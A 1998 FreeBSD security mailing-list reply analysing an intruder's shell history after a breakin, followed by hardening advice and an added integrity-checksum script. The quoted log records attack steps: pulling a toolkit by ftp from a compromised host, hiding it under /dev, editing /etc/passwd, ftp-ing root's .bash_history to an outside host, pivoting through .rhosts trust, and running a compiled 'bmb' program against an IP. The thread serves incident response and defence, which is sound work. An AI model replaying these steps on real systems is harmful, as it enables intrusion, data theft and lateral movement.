Date: Thu, 27 Aug 1998 01:31:03 -0400 (EDT)
From: "Craig H. Rowland" <crowland@psionic.com>
To: Wilson MacGyver <macgyver@cylatech.com>
Cc: security@FreeBSD.ORG
Subject: Re: post breakin log
Message-ID: <Pine.LNX.3.96.980827010411.2527A-100000@dolemite>
In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com>
On Thu, 27 Aug 1998, Wilson MacGyver wrote:

. . .

>
> has anyone seen some of these programs he ran/install/compile
> before?
>
> Thanks,
> Mac
>

He is mainly pulling in tools from remote hosts to further leverage his access; he is also running irc, probably a sniffer, and other typical nonsense. You should go through your log and write to the admin of each site listed to tell them about the problem so they can get rid of the intruder as well.

As an example you can look at his command:

ftp worldnetworks.net

Where he first went to get his bag-o-tricks to run on your box. Logging into this server you can see that it is horribly misconfigured, with FTP as the owner of the root directory. The .forward file was modified to mail the passwd list off to another account, etc. I'm sure if you go down the list you'll find they are all compromised. This is pretty standard :(

The /dev/sync directory is just a hiding place for his tools. Other common places include spool directories, user home directories, etc. It's pretty hard to tell where things will be placed once inside.

The best thing to do is reload your system (which it sounds like you've done). You'll also want to do some other things such as:

1) Ensure users don't reuse old passwords.
2) Keep up-to-date with security problems.
3) Shut off unneeded services.
4) Monitor your logs for suspicious activity.
5) Don't allow users shell access unless they need it.
6) Keep off-line cryptographically secure checksums of key system binaries and config files.
7) Limit access to system daemons to IP addresses that need them with some type of "wrapper" or IP filtering mechanism.
8) Shut off your r-services (rsh, rlogin) if you don't need them. It looks like he probably used a lot of transitive trusts (.rhosts, hosts.equiv) to move around your network.
9) Too many more to list here. :)

Shameless plug: I wrote a quick page a while back describing some of the more common attacks I've seen against hosts.
It may contain some useful information for you:

http://www.psionic.com/papers/attacks.html

-- Craig

> ----------------------
>
> cd /tmp
> telnet localhost 110
> ls -la
> mv popper /usr/local/libexec/
> telnet localhost 110
> rm -rf free*
> cd /games
> ls -la
> cd /dev
> mkdir sync
> cd sync
> ftp worldnetworks.net
> tar -xvf b.tar
> rm -rf b.tar
> cd bnc*
> make
> pico bnc.conf
> mv bnc ..
> cd ..
> rm -rf bnc2*
> vi bnc.conf
> mv bnc pine
> pine
> exit
> ls
> cd /usr
> ld
> ls
> cd ..
> ls
> cd root
> ls -la
> cd ..
> locate bnc
> locate irc
> ls
> locate tcp.log
> cd /dev
> ls
> tail ptyr
> tail ptyr1
> tail ptyp1
> tail ptyq1
> uname -a
> exit
> ls
> cd etc
> pico passwd
> tail passwd
> cd usr
> cd /usr
> ls
> cd sup
> ls
> ls -la
> cd src-all
> ls
> locate fbsdrootkit.tgz
> locate fb.tgz
> locate bnc.conf
> cd ..
> cd local
> ls
> cd ..
> ls
> cd /dev
> ls -la
> tail zero
> tail /root/.bash_history
> cd /root
> cp .bash_history h
> ftp bugs.mc.duke.edu
> rm h
> cd /dev
> cd sync
> ls
> tail bnc.conf
> exit
> cd /usr/games
> ls
> cd hack
> cd hide
> ls
> ls -la
> ./hack
> ls
> cd /dev/sync
> ls
> ls -la
> cd ..
> tail ptya
> locate irc
> irc
> BitchX
> cd sync
> ls
> tail bnc.conf
> telnet linuxppc.org
> telnet irc.686.org
> telnet irc686.com
> telnet irc.686.com
> who
> telnet onyx.eng.sunysb.edu
> telnet irc.686.com 90210
> telnet declan.bio.columbia.edu
> telnet sleepy.uncg.edu
> telnet sleepy.uncg.edu
> telnet desoto.coosavalley.net
> telnet 209.16.220.8
> telnet ramsis.spd.louisville.edu
> telnet nuptse.knowledge2000.com
> telnet ramses.spd.louisville.edu
> telnet cc607580-a.hwrd1.md.home.com
> pico
> tail /root/.bash_history
> ls
> uptime
> cd root
> ls
> tail .rhosts
> tail /etc/hosts.equiv
> cd /var/named
> cd var
> ls
> cd /var
> ls
> telnet STARLIGHT1.DIGITALSTARLIGHT.COM
> uname -a
> telnet www.cylatech.com
> rlogin -l ui8765 www.cylatech.com
> ls
> uname -a
> ftp bugs.mc.duke.edu
> gcc
> gcc -o bmb bmb.c
> ls
> ./bmb 207.153.39.89 23
> ls
> rm bmb*
> ls
> exit
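Item 6 of the list above in practice, as an added example that is not part of the original thread: a small POSIX shell integrity baseline that records SHA-256 checksums for a tree of key binaries and config files and later reports which files were MODIFIED, are MISSING, or are NEW (for instance tools dropped into a directory that should not change). It assumes sha256sum (coreutils) or sha256 (FreeBSD) is installed; the directory and file names are whatever the caller passes in.

```shell
#!/bin/sh
# Offline integrity baseline for key binaries and config files (item 6 above).
# Added example, not from the original thread. Assumes POSIX sh plus sha256sum
# (coreutils) or sha256 (FreeBSD). Keep the baseline file on read-only or
# offline media so an intruder who replaces binaries cannot also rewrite it.

# Print "<sha256>  <path>" for one file, whichever digest tool is installed.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        h=$(sha256sum "$1" | cut -d' ' -f1)
    else
        h=$(sha256 -q "$1")
    fi
    printf '%s  %s\n' "$h" "$1"
}

# baseline_create DIR OUTFILE: hash every regular file below DIR, sorted by path.
baseline_create() {
    find "$1" -type f | sort | while IFS= read -r f; do digest "$f"; done > "$2"
}

# baseline_verify DIR BASELINE: print one line per MODIFIED, MISSING or NEW file.
# Returns 0 when DIR still matches BASELINE, 1 when anything differs.
baseline_verify() {
    dir=$1; base=$2; rc=0
    cur=$(mktemp) || return 2
    baseline_create "$dir" "$cur"
    # Every entry recorded in the baseline: still present and unchanged?
    while IFS= read -r line; do
        path=$(printf '%s\n' "$line" | cut -d' ' -f3-)
        if [ ! -f "$path" ]; then
            echo "MISSING  $path"; rc=1
        elif ! grep -qxF "$line" "$cur"; then
            echo "MODIFIED $path"; rc=1
        fi
    done < "$base"
    # Files present now that the baseline never saw, e.g. dropped tools.
    while IFS= read -r line; do
        path=$(printf '%s\n' "$line" | cut -d' ' -f3-)
        cut -d' ' -f3- "$base" | grep -qxF "$path" || { echo "NEW      $path"; rc=1; }
    done < "$cur"
    rm -f "$cur"
    return $rc
}
```

Run `baseline_create /usr/local/libexec /mnt/readonly/libexec.sha256` from a known-good state and `baseline_verify` with the same arguments from cron or after an incident; a non-zero exit status means the tree no longer matches the stored checksums.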